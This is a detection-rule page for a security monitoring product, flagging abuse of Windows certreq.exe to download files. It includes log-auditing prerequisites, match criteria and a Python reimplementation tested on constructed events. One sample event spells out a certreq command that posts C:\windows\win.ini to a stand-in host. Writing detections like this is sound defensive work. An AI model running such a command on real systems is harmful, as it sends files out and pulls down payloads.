Suspicious Certreq Command to Download

Rule name: Suspicious Certreq Command to Download
Rule type: Standard
Log sources: Windows
MITRE ATT&CK tags: Command and Control: Ingress Tool Transfer (T1105)
Severity: Critical

About the rule

Rule Type

Standard

Rule Description

This detection identifies suspicious usage of certreq.exe—a legitimate Windows tool used for certificate requests—being leveraged to download files from remote servers. While certreq.exe is not typically associated with file downloads, threat actors may abuse it to bypass traditional security controls, as it is often trusted and less scrutinized by antivirus or endpoint protection systems. This behavior may indicate attempts to download malicious payloads or configuration files using trusted living-off-the-land binaries (LOLBins).

Severity

Trouble

Rule journey

Attack chain scenario

Initial Access → Execution → Defense Evasion → Command and Control

Impact

  • Command and Control
  • Defense evasion
  • Credential theft
  • Execution of malicious payloads

Rule Requirement

Prerequisites

Using Windows event viewer:
To enable detailed process tracking in a domain environment, log in to a domain controller using domain admin credentials and open the Group Policy Management Console (GPMC). Create or edit a GPO linked to the target OU, navigate to the Advanced Audit Policy Configuration section, and enable success auditing for both process creation and process termination. To capture command-line details, enable the "Include command line in process creation events" setting under Audit Process Creation. Additionally, create the Microsoft-Windows-Security-Auditing/Operational registry key in the specified EventLog path to support enhanced auditing.

Using Sysmon:
To enable detailed process monitoring using Sysmon, first download and install it from Microsoft Sysinternals. Run Command Prompt as an administrator and install Sysmon with a configuration file that includes process creation tracking, using sysmon.exe -i [configfile.xml]. Ensure the configuration includes a <ProcessCreate> filter so that all process creation events are captured. Additionally, create the Microsoft-Windows-Sysmon/Operational registry key under the EventLog path if it doesn't already exist.

Criteria

Action1: actionname = "Process started"
  AND (PROCESSNAME endswith "\certreq.exe" OR ORIGINALFILENAME = "CertReq.exe")
  AND (COMMANDLINE contains " -Post " AND COMMANDLINE contains " -config "
       AND COMMANDLINE contains " http" AND COMMANDLINE contains " C:\windows\win.ini ")
select Action1.HOSTNAME, Action1.MESSAGE, Action1.COMMANDLINE, Action1.FILE_NAME, Action1.PROCESSNAME, Action1.USERNAME, Action1.PARENTPROCESSNAME
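As an added example (not the detection engine's or the rule author's own code), the following Python reimplements the Criteria above over constructed process-creation events, so each clause can be checked against a known-bad command line and a legitimate enrollment. The event field names and the case-insensitive string comparison are assumptions; the page does not state how the engine compares strings.

```python
# Constructed sample events (not real telemetry). Field names are assumptions
# mapped from the rule's HOSTNAME / COMMANDLINE / PROCESSNAME / ... columns.
SAMPLE_EVENTS = [
    {   # LOLBAS-style certreq download: every clause of the rule is satisfied
        "action": "Process started", "hostname": "WS01",
        "process_name": "C:\\Windows\\System32\\certreq.exe",
        "original_file_name": "CertReq.exe",
        "command_line": "certreq -Post -config http://example.invalid/ C:\\windows\\win.ini C:\\Users\\Public\\out.txt",
        "user_name": "CORP\\jdoe", "parent_process_name": "C:\\Windows\\System32\\cmd.exe",
    },
    {   # Legitimate enrollment against an enterprise CA: must not fire
        "action": "Process started", "hostname": "WS02",
        "process_name": "C:\\Windows\\System32\\certreq.exe",
        "original_file_name": "CertReq.exe",
        "command_line": "certreq -submit -config CA01\\Corp-CA request.req cert.cer",
        "user_name": "CORP\\svc_pki", "parent_process_name": "C:\\Windows\\System32\\svchost.exe",
    },
    {   # Same switches from a different binary: the process-name clause fails
        "action": "Process started", "hostname": "WS03",
        "process_name": "C:\\Tools\\curl.exe", "original_file_name": "curl.exe",
        "command_line": "curl -Post -config http://example.invalid/ C:\\windows\\win.ini out.txt",
        "user_name": "CORP\\admin", "parent_process_name": "C:\\Windows\\explorer.exe",
    },
]

# The four literal substrings from the rule's Criteria. Comparison is done
# case-insensitively here (assumption: Windows switches and paths are
# case-insensitive in practice; the engine's own behaviour is not stated).
REQUIRED_TOKENS = (" -Post ", " -config ", " http", " C:\\windows\\win.ini ")

def is_certreq_process(event):
    """PROCESSNAME endswith "\\certreq.exe" OR ORIGINALFILENAME = "CertReq.exe"."""
    name = event.get("process_name", "").lower()
    orig = event.get("original_file_name", "").lower()
    return name.endswith("\\certreq.exe") or orig == "certreq.exe"

def matches_rule(event):
    """True when a 'Process started' event satisfies every clause of the Criteria."""
    if event.get("action") != "Process started" or not is_certreq_process(event):
        return False
    cmd = event.get("command_line", "").lower()
    return all(tok.lower() in cmd for tok in REQUIRED_TOKENS)

def evaluate(events):
    """Project the columns of the rule's select clause for each matching event."""
    fields = ("hostname", "command_line", "process_name", "user_name", "parent_process_name")
    return [{f: e.get(f) for f in fields} for e in events if matches_rule(e)]
```

Running `evaluate(SAMPLE_EVENTS)` returns only the WS01 event; the enrollment on WS02 and the non-certreq process on WS03 are filtered out.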

Detection

Execution Mode

realtime

Log Sources

Windows

MITRE ATT&CK

Command and Control: Ingress Tool Transfer (T1105)

Security Standards

Enabling this rule will help you meet the security standard requirement listed below:

PR.DS-01: The confidentiality, integrity, and availability of data-at-rest are protected

When this rule is triggered, it indicates that certreq.exe—typically used for certificate requests—was executed in a manner suggesting it was used to download a file.

Author

Christian Burkard (Nextron Systems)

Future actions

Known False Positives

Legitimate administrative tasks involving certificate enrollment or renewal—especially in environments using automated certificate management solutions—might generate similar certreq.exe command-line activity.

Next Steps

When this rule is triggered, the following measures can be implemented:

  • Identification: Review the command-line arguments used with certreq.exe, especially any URLs or file paths.
  • Analysis: Identify the parent process and check if it’s an unusual script or application.
  • Response: Isolate the endpoint, block the external domain or IP, and remove the downloaded file.
  • Restrict Tool Usage: Limit access to system tools like certreq.exe to only trusted users and sanctioned processes via application control or AppLocker policies.

Mitigation

Mitigation ID: M1031
Mitigation Name: Network Intrusion Prevention
Mitigation description: Network intrusion detection and prevention systems that use network signatures to identify traffic for specific adversary malware or unusual data transfer over known protocols like FTP can be used to mitigate activity at the network level. Adversaries will likely change tool C2 signatures over time or construct protocols in such a way as to avoid detection by common defensive tools.